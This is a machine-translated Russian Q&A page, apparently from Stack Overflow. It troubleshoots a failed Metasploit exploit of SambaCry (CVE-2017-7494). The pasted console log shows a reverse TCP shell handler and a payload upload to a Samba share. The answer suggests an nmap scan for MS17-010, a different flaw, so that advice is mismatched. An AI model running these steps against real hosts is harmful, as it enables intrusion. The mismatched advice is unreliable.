не удалось использовать valnurability samba cry с помощью metasploit

Я пытаюсь использовать уязвимость ядра Linux samba cry (CVE-2017-7494) для некоторой исследовательской работы с использованием платформы metasploit. Но я получаю следующую ошибку: эксплойт msf (is_known_pipename)> run

[*] Started reverse TCP handler on 192.168.78.136:4444 
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the 
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to 
\\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path  
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.

это потому, что мой целевой хост недоступен или какая-то другая проблема? На моем целевом хосте установлена ​​версия samba - 3.6.23, которая, насколько мне известно, ценна.

Благодарность


person user1743185    schedule 23.06.2017    source источник


Ответы (1)


Не удалось загрузить STATUS_OBJECT_NAME_NOT_FOUND означает «Имя объекта не найдено». Вероятно, метасплоиту не удалось загрузить полезную нагрузку в общую папку. Можете попробовать запустить nmap и проверить наличие уязвимости? Команда nmap -p445 --script smb-vuln-ms17-010 TARGET_IP

person Antonio Piccolo    schedule 03.07.2017